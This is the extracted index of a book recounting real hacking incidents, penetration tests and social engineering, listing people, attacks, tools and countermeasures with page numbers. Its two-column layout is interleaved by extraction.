decompiling. See reverse engineering                            downloading source code, 164–165
defense in depth, 193                                           dumping Registry information, 161
Defense Information Systems Network Equipment                   examining Internet Explorer history, 162
       Manager (DEM), 27                                        hacking target applications, 161–163
defense strategies. See countermeasures                         hacking the target, 159–160
defense-in-depth model, 45, 149                                 identifying the target, 158–159
DEM (Defense Information Systems                                known plaintext attack, 165–166
       Network Equipment Manager), 27                           password cracking, 157–159, 165–166
demilitarized zone (DMZ), 45, 202–207                           port scans, 155–157
desire to help, 235–236                                         retrieving licensing keys, 161–162
distracting the target, 234–235                                 tracing network packets, 162–163
Dixie bank hack, 143, 145–147                                 Estonian bank hack, 139–141
DMZ (demilitarized zone), 45, 202–207                         ethics of social engineering, 135
                                                              The Eudaemonic Pie, 3
264                                                   Index

European security company intrusion. See security               dumpster diving, 70–71
      company intrusion                                         hotel services, theft of, 72–73
examining network connections, 161                              phone phreaking, 70–71
excessive privileges, 66                                        prison time, 84–86
Excite@Home hack, 93–98                                         punishment, 81, 82–84
exiting personnel, 64                                           U.S. District Court hack, 71–72, 73–74
exploits. See also vulnerabilities                            Brock
  definition, 43                                                3COM device configuration, determining,
  misconfigured proxy servers, 94, 99                                  200–202
  setup.pl, 167–168                                             accessing the company system, 211–215
  zero-day, 45                                                  background, 195–196
                                                                barging the IIS server, 213
FBI                                                             countermeasures, 216–218
   challenged by ne0h, 39                                       hackers’ background, 195–196
   eavesdropping by Adrian Lamo, 107–108                        identifying a router, 198–199
   gLobaLheLL roundup, 39                                       mapping the network, 197–198, 202–207
   Khalid Ibrahim as informant, 39–40                           passwords, cracking, 200, 210, 214
   White House break-in, 35–39                                  ping sweeps, 202–203
fear, and social engineering, 237                               port scanning, 199–201
federal prisons, 49–51                                          remote control of a PC, 208–211
filtering unnecessary services, 218                             researching the target, 196–197
firewalls                                                       reverse DNS lookup, 197–198
   corporate, 186                                               success, 215
   default rules, 111                                           trapped in a DMZ, 202–207
   personal, 186–187                                          Burns, Eric (Zyklon)
   rules review, 136                                            punishment, 40
   stateful inspection, 186                                     White House break-in, 35–39, 43–44
   TCP port 53, blocking access to, 111                       Butler, William. See Texas prison hack
firmware. See also software                                   Cerebrum. See Anderson, Charles Matthew (Matt)
   access control, 20                                         Chameleon, 27
   reverse engineering, 5–6                                   Comrade
   rewriting, 6–8                                               background, 23
forcing the target into a role, 234                             busted, 30–32
FrontPage, vulnerabilities, 172                                 current activities, 40–41
                                                                and Khalid Ibrahim, 25–27
Gabriel                                                         and ne0h, 22–25
  background, 143–145                                           SIPRNET hack, 28–29
  Dixie bank hack, 145–147                                    Costa. See Katsaniotis, Costa
  long-distance bank hacks, 145–148                           Davis, Chad, 39–40
  Spy Lantern Keylogger, 144, 148                             Dykes, Dustin
  Swiss bank hack, 147–148                                      accessing internal documents, 129–130
get-out-of-jail-free card, 118                                  the attack, 127–128
gLobaLheLL group, 26, 35–39                                     background, 124
Gordon, Michael, 33                                             cease-and-desist process, 125
Gregory, Patrick, 39–40                                         countermeasures, 135–137
guidelines for social engineering training, 238–239             establishing wireless access, 127–128
                                                                ethics of social engineering, 135
H4G (Hacking for Girlies), 100                                  ground rules, 125–126
hackers                                                         hand warmer trick, 133–134
  into commercial software. See crackers                        l0phtCrack, 128–129
  groups                                                        logging keystrokes, 130–132
    gLobaLheLL, 35–39                                           outsmarting door sensors, 133–134
    H4G (Hacking for Girlies), 100                              password cracking, 128–129
    Milw0rm, 33                                                 phony badges, 130–131, 137
  intuition, 207                                                planning, 126–127
  online sites                                                  red teaming, 126–127
    Efnet, 24–25                                                REX (Request to Exit), 133
    Netcraft.com, 94–95                                         shoulder surfing, 126–127
    sharing with other crackers, 182–185                        tailgating, 132–133
    Warez sites, 182–185                                        test results, 134–135
hackers, individual                                           Gabriel
  Anderson, Charles Matthew. See also                           background, 143–145
         Boeing hacks (Matt and Costa)                          Dixie bank hack, 145–147
    arrest for Boeing hack, 82–83                               long-distance bank hacks, 145–148
    background, 70                                              Spy Lantern Keylogger, 144, 148
    current activities, 87                                      Swiss bank hack, 147–148
                                                              Gregory, Patrick, 39–40
                                                 Index                                                265

Juhan, 140–143                                               Lockheed Martin hack, 27–28
Katsaniotis, Costa. See also Boeing hacks (Matt and          SIPRNET hack, 29
       Costa)                                                White House break-in, 35–39
  arrest for Boeing hack, 82–83                            SIPRNET hack, 30–32
  background, 69–70                                        Whurley
  current activities, 87                                     cold readings, 222–223
  dumpster diving, 70–71                                     direction of approach, 223–224
  hotel services, theft of, 72–73                            fooling the guards, 223–224
  phone phreaking, 70–71, 84–86                              impersonating an employee, 226–229
  prison time, 84–86                                         Las Vegas security audits, 222–232
  punishment, 81, 82–84                                      phony badges, 229–230
  U.S. District Court hack, 71–72, 73–74                     psychology of color, 225–226
Lamo, Adrian                                                 schmoozing casino staffers, 222–223
  background, 93                                           Zatko, Pieter (Mudge)
  current activities, 107–108                                the attack, 118–119
  damage costs, 105, 109–110                                 background, 116
  eavesdropping on the FBI, 107–108                          dumpster diving, 118, 120–121
  Excite@Home hack, 93–98                                    e-mail sniffing, 122
  free-form SQL query, 102–103                               final report, 123–124
  kitten rescue, 92–93                                       fortuitous blackout, 121–122
  Lexis/Nexis hack, 104–105                                  get-out-of-jail-free card, 118
  MCI WorldCom hack, 98–99                                   ground rules, 117–119
  Microsoft hack, 99–100                                     meeting the client, 117
  misconfigured proxy servers, exploiting, 94, 99            NDAs (nondisclosure agreements), 118–119
  monitoring network activity, 96–97                         tailgating, 121
  New York Times hack, 100–108                               voicemail snooping, 122
  open shares, 96                                          Zyklon. See Burns, Eric
  password cracking, 103–104                             Hacking for Girlies (H4G), 100
  personal history, 93                                   hand warmer trick, 133–134
  punishment, 107–108                                    hardening, countermeasures, 218
  RAT (Remote Access Trojan), 96                         Harkat ul-Mujahideen group, 34
  restitution to victims, 107–108                        Harkat-ul-Ansar group, 34
  reverse DNS lookup, 95–96                              hashing (checksumming), 21
  unique skills, 106–107                                 help desk, hacking, 171–173
Louis                                                    heuristic information processing, 234–235
  3COM device configuration, determining, 200–202        host names
  accessing the company system, 211–215                    reverse DNS lookup
  background, 195–196                                        countermeasures, 111–112
  barging the IIS server, 213                                Excite@Home hack, 95–96
  countermeasures, 216–218                                   security company intrusion, 197–198
  hackers’ background, 195–196                           hotel services, theft of, 72–73, 87–88
  identifying a router, 198–199
  mapping the network, 197–198, 202–207                  Ibrahim, Khalid
  passwords, cracking, 200, 210, 214                       background investigation, 32–34
  ping sweeps, 202–203                                     FBI informant, 39–40
  port scanning, 199–201                                   Harkat ul-Mujahideen group, 34
  remote control of a PC, 208–211                          Harkat-ul-Ansar group, 34
  researching the target, 196–197                          recruiting hackers, 25–32
  reverse DNS lookup, 197–198                            IDA Pro, 173
  success, 215                                           impersonating an employee, 226–229
  trapped in a DMZ, 202–207                              incident response, 188
Matt. See Anderson, Charles Matthew                      Indian Airlines hijacking, 29–30
Mayfield, Alex. See casino hack                          information leakage, countermeasures, 110
MindPhasr, 39–40                                         insider abuse, 62–66
MostFearD, 36                                            installation files, removing, 192
MostHateD, 39–40                                         intellectual property hack
Mudge. See Zatko, Pieter                                   busted, 163–164
ne0h                                                       close call, 160–161
  on 9/11, 35                                              downloading source code, 164–165
  background, 24                                           dumping Registry information, 161
  Boeing hack, 27–28                                       examining Internet Explorer history, 162
  challenge to the FBI, 39                                 hacking target applications, 161–163
  and Comrade, 22–25                                       hacking the target, 159–160
  current activities, 40–41                                identifying the target, 158–159
  Indian Airlines hijacking, 29–30                         known plaintext attack, 165–166
  and Khalid Ibrahim, 25–27, 32–33                         password cracking, 157–159, 165–166
 266                                                   Index

intellectual property hack (continued)                            countermeasures, 20
  port scans, 155–157                                             damage costs, 18–20
  retrieving licensing keys, 161–162                              development phase, 4–6
  tracing network packets, 162–163                                firmware, 5–8
Interactive Disassembler, 173                                     getting caught, 16–18
Internet banking, 139–141                                         insight, 20
IP addresses                                                      playing the slots, 8–16
  ARIN (American Registry for Internet Numbers),                  punishment, 18
         100–101                                                  random number generator
  finding host names from. See reverse DNS lookup                    manipulating the slots, 10
  netblocks, 101                                                     reverse engineering, 12–13
  reverse DNS lookup                                                 rewriting, 6–8
     countermeasures, 111–112                                        true randomness, 20
     Excite@Home hack, 95–96                                      research phase, 2–4
     security company intrusion, 197–198                          wearable computer, 13–16
Iraqi Army hack, 250–252                                       Las Vegas security audits, 222–232
                                                               law enforcement training. See cops and robbers
jailbait hack, 255–257                                         Lexis/Nexis hack, 104–105
Juhan, 140–143                                                 licensing keys, retrieving, 161–162
Jurassic Park hack, 248–250                                    liking, and social engineering, 236–237
                                                               Lockheed Martin hack, 27–28, 42–44
Katsaniotis, Costa                                             loft. See l0pht
  arrest for Boeing hack, 82–83                                logging keystrokes, 130–132, 144, 148
  background, 69–70                                            Louis
  current activities, 87                                          3COM device configuration, determining, 200–202
  dumpster diving, 70–71                                          accessing the company system, 211–215
  hotel services, theft of, 72–73                                 background, 195–196
  phone phreaking, 70–71, 84–86                                   barging the IIS server, 213
  prison time, 84–86                                              countermeasures, 216–218
  punishment, 81, 82–84                                           hackers’ background, 195–196
  restitution, 82–84                                              identifying a router, 198–199
  U.S. District Court hack, 71–72, 73–74                          mapping the network, 197–198, 202–207
Keebler Elves, 24                                                 passwords, cracking, 200, 210, 214
Keyghost keystroke logger, 131–132                                ping sweeps, 202–203
keystrokes, logging, 130–132, 144, 148                            port scanning, 199–201
kitten rescue, 92–93                                              remote control of a PC, 208–211
known plaintext attack, 165–166                                   researching the target, 196–197
Knuth, Donald, 6–8                                                reverse DNS lookup, 197–198
                                                                  success, 215
l0pht Heavy Industries, 116. See also penetration testing         trapped in a DMZ, 202–207
l0phtCrack, 128–129                                            LsaDump2, 161
l0phtCrack III, 180
Lamo, Adrian                                                   mailing lists, retrieving, 167–168
  background, 93                                               Markoff, John, 100
  current activities, 107–108                                  Matt (Anderson, Charles Matthew)
  damage costs, 105, 109–110                                    arrest for Boeing hack, 82–83
  eavesdropping on the FBI, 107–108                             background, 70
  Excite@Home hack, 93–98                                       current activities, 87
  free-form SQL query, 102–103                                  dumpster diving, 70–71
  kitten rescue, 92–93                                          hotel services, theft of, 72–73
  Lexis/Nexis hack, 104–105                                     phone phreaking, 70–71
  MCI WorldCom hack, 98–99                                      prison time, 84–86
  Microsoft hack, 99–100                                        punishment, 81, 82–84
  misconfigured proxy servers, exploiting, 94, 99               restitution, 82–84
  monitoring network activity, 96–97                            U.S. District Court hack, 71–72, 73–74
  New York Times hack, 100–108                                 Mayfield, Alex. See casino hack
  open shares, 96                                              MCI WorldCom hack, 98–99
  password cracking, 103–104                                   McKay, Niall, 27, 30
  personal history, 93                                         metamorphosis of the spirit, 59
  punishment, 107–108                                          Microsoft FrontPage, vulnerabilities, 172
  RAT (Remote Access Trojan), 96                               Microsoft hack, 99–100
  restitution to victims, 107–108                              Microsoft SQL servers, protecting, 190–191
  reverse DNS lookup, 95–96                                    Microsoft VPN services, 192
  unique skills, 106–107                                       Milw0rm group, 33
Las Vegas hack                                                 MindPhasr, 39–40
  aftermath, 18–20                                             missing paycheck hack, 247–248
  avoiding detection, 10–11                                    MIT of China hack, 25–27
                                                   Index                                                267

Mitnick, Kevin                                             New York Times hack, 100–108
 approached by Columbian drug lord, 41                     Nietzsche, Friedrich, 59
 The Art of Deception, 88, 232, 233                        9/11, aftermath of, 34–35
 Takedown, 24                                              Nmap, 199–201
M&M security, 176                                          nondisclosure agreements (NDAs), 118–119
momentum of compliance, 235
money transport intrusion                                  one-way hash, 128–129
 3COM device configuration, determining, 200–202           on-site visitor policies, 65
 accessing the company system, 211–215                     open shares, 96
 barging the IIS server, 213                               Operation Eligible Receiver, 41–42
 countermeasures, 216–218                                  Outlook.pst file, retrieving, 178
 hackers’ background, 195–196
 identifying a router, 198–199                             passwords
 mapping the network, 197–198, 202–207                       breaking encryption, 76, 128–129
 passwords, cracking, 200, 210, 214                          changing, 88
 ping sweeps, 202–203                                        Coke vending machine, 250
 port scanning, 199–201                                      cracking
 remote control of a PC, 208–211                               bank hacks, 142, 148
 researching the target, 196–197                               countermeasures, 217
 reverse DNS lookup, 197–198                                   extracting password hashes, 157–158
 success, 215                                                  guessing, 159, 200
 trapped in a DMZ, 202–207                                     hashes, tables of, 180
MostFearD, 36                                                  known plaintext attack, 165–166
MostHateD, 39–40                                               l0phtCrack, 116, 128–129
MS SQL injection attacks, protecting against, 191–192          l0phtCrack III, 180
Mudge (Zatko, Pieter)                                          PkCrack, 165–166
 the attack, 118–119                                           predictability, 103–104
 background, 116                                               PwDump2, 180
 dumpster diving, 118, 120–121                                 rainbow tables attack, 180
 e-mail sniffing, 122                                          scanning e-mail messages, 178–179
 final report, 123–124                                         searching file contents, 146, 210, 214
 fortuitous blackout, 121–122                                  two-year hack, 159
 get-out-of-jail-free card, 118                                wildcards, 175
 ground rules, 117–119                                       hacker observations, 180
 meeting the client, 117                                     managing, 63, 189–190, 217
 NDAs (nondisclosure agreements), 118–119                    one-way hash, 128–129
 tailgating, 121                                             protecting, 136
 voicemail snooping, 122                                     RSA SecureID, 37
                                                             static, 88
NDAs (nondisclosure agreements), 118–119                     Unix/Linux password files, 37
ne0h                                                       patch management, 44–45
  on 9/11, 35                                              PC Anywhere, 208–211
  background, 24                                           pedophile hack, 255–257
  Boeing hack, 27–28                                       penetration testing
  challenge to the FBI, 39                                   Dykes, Dustin
  and Comrade, 22–25                                           accessing internal documents, 129–130
  current activities, 40–41                                    the attack, 127–128
  Indian Airlines hijacking, 29–30                             background, 124
  and Khalid Ibrahim, 25–27, 32–33                             cease-and-desist process, 125
  Lockheed Martin hack, 27–28                                  countermeasures, 135–137
  SIPRNET hack, 29                                             establishing wireless access, 127–128
  White House break-in, 35–39                                  ethics of social engineering, 135
netblocks, 101                                                 ground rules, 125–126
Netcraft.com, 94–95                                            hand warmer trick, 133–134
netstat command, 96–97, 161                                    l0phtCrack, 128–129
networks                                                       logging keystrokes, 130–132
  access protection, 136                                       outsmarting door sensors, 133–134
  activity, monitoring, 96–97                                  password cracking, 128–129
  establishing wireless access, 127–128                        phony badges, 130–131, 137
  examining connections, 161                                   planning, 126–127
  intrusions, 161–163                                          red teaming, 126–127
  mapping, 197–198, 202–207                                    REX (Request to Exit), 133
  monitoring, 45–46                                            shoulder surfing, 126–127
  netstat command, 161                                         tailgating, 132–133
  shares, 177, 190                                             test results, 134–135
  tracert command, 162–163
  tracing packets, 162–163
268                                               Index

penetration testing (continued)                           ProxyHunter, 99
  Zatko, Pieter (Mudge)                                   psychology of color, 225–226
     the attack, 118–119                                  psychology of social engineering. See social psychol-
     background, 116                                            ogy of social engineering
     dumpster diving, 118, 120–121                        punishment. See also prison time; restitution
     e-mail sniffing, 122                                   Anderson, Charles Matthew, 81, 82–84
     final report, 123–124                                  Butler, William. See Texas prison hack
     fortuitous blackout, 121–122                           casino hack, 18
     get-out-of-jail-free card, 118                         Comrade, 30–32
     ground rules, 117–119                                  Davis, Chad, 39–40
     meeting the client, 117                                Gregory, Patrick, 39–40
     NDAs (nondisclosure agreements), 118–119               Katsaniotis, Costa, 81, 82–84
     tailgating, 121                                        Lamo, Adrian, 107–109
     voicemail snooping, 122                                MindPhasr, 39–40
permissions, cracker countermeasures, 188–189               MostHateD, 39–40
personal firewalls, 186–187                                 reluctance to prosecute, 143
PHF (phone book) script, vulnerabilities, 43–44             SIPRNET hack, 30–32
phone book (PHF) script, vulnerabilities, 43–44           PwDump2, 180
phone hacking. See also phreaking
  voicemail snooping, 122                                 RahulB (terrorist). See Ibrahim, Khalid; terrorist
  war dialing, 71–72, 121                                         intrusions
phony badges, 130–131, 137, 229–230                       rainbow tables attack, 180
phreaking, 70–71, 84–86. See also phone hacking           Rama3456 (terrorist). See Ibrahim, Khalid; terrorist
physical access, 63–64                                            intrusions
physical analysis. See dumpster diving                    random number generators
ping sweeps, 202–203                                         manipulating the slots, 10
PkCrack, 165–166                                             reverse engineering, 6–8, 12–13
poker hack, 254–255                                          rewriting, 6–8
porn spam, 167–168                                           true randomness, 7, 20
port restrictions, 113                                    RAT (Remote Access Trojan), 96
port scanning                                             reactance, 237–238
  cracker countermeasures, 187                            red teaming, 126–127
  identifying server software, 155–157                    Registry information, dumping, 161
  security company intrusion, 199–201                     Remote Access Trojan (RAT), 96
ports, using high numbers, 216                            remote control of a PC, 208–211
preventive measures. See countermeasures                  Reno, Janet, 31–32
prison hack. See Texas prison hack                        Request to Exit (REX), 133
prison time. See also punishment; restitution; Texas      restitution. See also prison time; punishment
        prison hack                                          Anderson, Charles Matthew, 82–84
  Boron Federal Prison Camp, 86                              Boeing hack (Matt and Costa), 82–83
  federal prisons, 49–51                                     Katsaniotis, Costa, 82–84
  phone phreaking, 84–85                                     Lamo, Adrian, 107–108
  prison life, 49–51, 86–87                               reverse DNS lookup
  Sheridan Camp, 86                                          countermeasures, 111–112
prisoner escort intrusion                                    Excite@Home hack, 95–96
  3COM device configuration, determining, 200–202            security company intrusion, 197–198
  accessing the company system, 211–215                   reverse engineering
  barging the IIS server, 213                                C code to assembler, 173
  countermeasures, 216–218                                   commercial software. See crackers
  hackers’ background, 195–196                               random number generators, 6–8
  identifying a router, 198–199                              slot machine firmware, 5–6
  mapping the network, 197–198, 202–207                   REX (Request to Exit), 133
  passwords, cracking, 200, 210, 214                      risk assessment, 41–42
  ping sweeps, 202–203                                    Robert
  port scanning, 199–201                                     accessing the help desk, 171–173
  remote control of a PC, 208–211                            background, 166, 168–169
  researching the target, 196–197                            backticked variable injection flaw, 167–168
  reverse DNS lookup, 197–198                                backup dangers, 177–179
  success, 215                                               discovering server names, 170–171
  trapped in a DMZ, 202–207                                  e-mail addresses, retrieving, 178
programs. See software                                       hacking video post production software, 169–177
protective measures. See countermeasures                     Outlook.pst file, retrieving, 178
proxy servers                                                passwords, cracking, 175, 178–179, 180
  finding, 99                                                passwords, observations on, 179–180
  misconfigured, countermeasures, 112                        porn spam, 167–168
  misconfigured, exploiting, 94, 99                          rainbow tables attack, 180
                                                Index                                              269

  retrieving mailing lists, 167–168                       Excite@Home hack, 95
  setup.pl exploit, 167–168                               fear, 237
  SQL injection attack, 173–177                           fooling the guards, 223–224
  uploading to protected directories, 172                 forcing the target into a role, 234
Robin Hood hacker. See Lamo, Adrian                       heuristic information processing, 234–235
role, and social engineering, 232–233                     impersonating an employee, 226–229
role-based accounts, 62–63                                Las Vegas security audits, 222–232
roulette hack, 3                                          liking, 236–237
routers, identifying, 198–199                             momentum of compliance, 235
                                                          penetration testing, 121, 132–133
Sagarin, Brad, 232, 233                                   phone number sniffing, countermeasures, 110
scanning for vulnerabilities, CGI (common gateway         phony badges, 130–131, 137, 229–230
       interface), 43                                     politeness norm, 136
Secret Internet Protocol Router Network                   psychology of color, 225–226
       (SIPRNET), 28–29, 30–32                            reactance, 237–238
securing personal laptops, countermeasures, 217           schmoozing casino staffers, 222–223
security company intrusion                                shoulder surfing, 126–127
  3COM device configuration, determining, 200–202         social psychology of persuasion, 232
  accessing the company system, 211–215                   stealing hotel services, 72–73
  barging the IIS server, 213                             systematic information processing, 234–235
  countermeasures, 216–218                                tailgating, 121, 132–133, 136
  hackers’ background, 195–196                            training guidelines, 238–240
  identifying a router, 198–199                           training programs, 240–242
  mapping the network, 197–198, 202–207                   trappings of role, 232–233
  passwords, cracking, 200, 210, 214                      in your own family, 242–244
  ping sweeps, 202–203                                  social psychology of social engineering
  port scanning, 199–201                                  altercasting, 234
  remote control of a PC, 208–211                         attribution, 236
  researching the target, 196–197                         cold reading, 236
  reverse DNS lookup, 197–198                             credibility, 233
  success, 215                                            desire to help, 235–236
  trapped in a DMZ, 202–207                               distracting the target, 234–235
security measures. See countermeasures                    fear, 237
security through obscurity, 94                            forcing the target into a role, 234
sensitive files, protecting, 191                          heuristic information processing, 234–235
September 11, aftermath of, 34–35                         liking, 236–237
server names, discovering, 170–171                        momentum of compliance, 235
server software, identifying, 155–157                     persuasion, 232
setup.pl, vulnerabilities, 167–168                        reactance, 237–238
setup.pl exploit, 167–168                                 systematic information processing, 234–235
shoulder surfing, 126–127                                 trappings of role, 232–233
SIPRNET (Secret Internet Protocol Router Network),      soft drink machine hack, 250
       28–29, 30–32                                     software. See also firmware
slot machine hack. See casino hack                        dumping Registry information, 161
sniffers                                                  examining network connections, 161
  Boeing hack, 28                                         IDA Pro, 173
  Chinese university hack, 26                             Interactive Disassembler, 173
  e-mail, 122                                             inventory and auditing, 65–66
  hiding, 43                                              l0phtCrack, 116, 128–129
  Lockheed Martin hack, 43                                LsaDump2, 161
  passwords, 43                                           netstat command, 161
  phone numbers, 110                                      network intrusions, 161–163
  SIPRNET hack, 31                                        Nmap, 199–201
snooping. See sniffers                                    password cracking
social engineering                                           John the Ripper, 142
  altercasting, 234                                          l0phtCrack, 116, 128–129
  attribution, 236                                           l0phtCrack III, 180
  Chinese university hack, 25–27                             PkCrack, 165–166
  cold readings, 222–223, 236                                PwDump2, 180
  countermeasures, 110, 238                               PC Anywhere, 208–211
  credibility, 233                                        PkCrack, 165–166
  desire to help, 235–236                                 port scanning, 199–201
  direction of approach, 223–224                          proxy server lookup, 99
  distracting the target, 234–235                         ProxyHunter, 99
  dumpster diving, 70–71, 118, 120–121                    PwDump2, 180
  ethics of, 135                                          RAT (Remote Access Trojan), 96
 270                                                     Index

software (continued)                                              downloading source code, 164–165
  remote control of a PC, 208–211                                 dumping Registry information, 161
  reverse engineering C code to assembler, 173                    examining Internet Explorer history, 162
  sniffers                                                        hacking target applications, 161–163
     Boeing hack, 28                                              hacking the target, 159–160
     Chinese university hack, 26                                  identifying the target, 158–159
     hiding, 43                                                   known plaintext attack, 165–166
     Lockheed Martin hack, 43                                     password cracking, 157–159, 165–166
     passwords, 43                                                port scans, 155–157
     SIPRNET hack, 31                                             retrieving licensing keys, 161–162
  tracert command, 162–163, 198–199                               tracing network packets, 162–163
  tracing network packets, 162–163
  Trojans, U.S. District Court hack, 73–74                       unauthorized hardware, 64–65
  Whois queries, 110                                             uploading to
Spy Lantern Keylogger, 144, 148                                    protected directories, 172
SQL injection attack, 173–177                                      Warez sites, 183
SQL servers, protecting, 190–191                                 U.S. District Court hack, 71–72, 73–74, 87–88
stateful inspection firewalls, 186
strategies for attacks. See specific strategies                  vending machine hack, 250
Swiss bank hack, 147–148                                         video post production software, hacking, 169–177
systematic information processing, 234–235                       Visual SourceSafe, vulnerabilities, 179
system-management tasks, cracker countermeasures,                voicemail snooping, 122
       187–188                                                   VPN services, 192
                                                                 vulnerabilities. See also exploits
tailgating, 121, 132–133, 136                                      Apache server software, 119
Takedown, 24                                                       backticked variable injection flaw, 167–168
target-rich environments, 63                                       BIND (Berkeley Internet Name Domain), 43
telephone hacking. See phone hacking; phreaking                    Citrix Metaframe shadowing feature, 144, 145
terrorist intrusions                                               DNS (Domain Name Servers), 43
  aftermath, 39–40                                                 electronic attack on the U. S., 41–42
  aftermath of 9/11, 34–35                                         encryption, 12–13
  Chinese university hack, 25–27                                   Microsoft FrontPage, 172
  countermeasures, 44–46                                           PHF hole, 120
  DEM hack, 27                                                     PHF (phone book) script, 43–44
  Indian Airlines hijacking, 29–30                                 scanning for, CGI (common gateway interface), 43
  insight, 42–44                                                   setup.pl, 167–168
  Lockheed Martin hack, 27–28, 42–44                               Solaris operating system, 119
  SIPRNET hack, 28–29, 30–32                                       Visual SourceSafe, 179
  threat assessment, 41–42
  White House break-in, 35–39, 43–44                             wearable computer, 13–16
Texas Hold ’Em hack, 254–255                                     White House break-in, 35–39, 43–44
Texas prison hack. See also prison time                          Whois queries, 110
  countermeasures, 62–66                                         Whurley, 222–230
  federal prisons, 49–51                                         Windows, hardening, 192–193
  getting caught, 56–59
  hacker’s background, 59–60                                     Zatko, Pieter (Mudge)
  hacker’s life after prison, 60–62                                the attack, 118–119
  insight, 62                                                      background, 116
  life in prison, 49–51                                            dumpster diving, 118, 120–121
  online in safety, 53–56                                          e-mail sniffing, 122
  trading food for computer gear, 51–52                            final report, 123–124
third-party applications, cracker countermeasures, 190             fortuitous blackout, 121–122
threat assessment, terrorist intrusions, 41–42                     get-out-of-jail-free card, 118
3COM device configuration, determining, 200–202                    ground rules, 117–119
tools and utilities. See software                                  meeting the client, 117
tracert command, 162–163, 198–199                                  NDAs (nondisclosure agreements), 118–119
trapdoors. See Trojans                                             tailgating, 121
trappings of role, 232–233                                         voicemail snooping, 122
Trojans, 73–74, 150                                              zero-day exploits, 45
two-year hack                                                    zone transfer, 111
  busted, 163–164                                                Zyklon (Burns, Eric), 35–40, 43–44
  close call, 160–161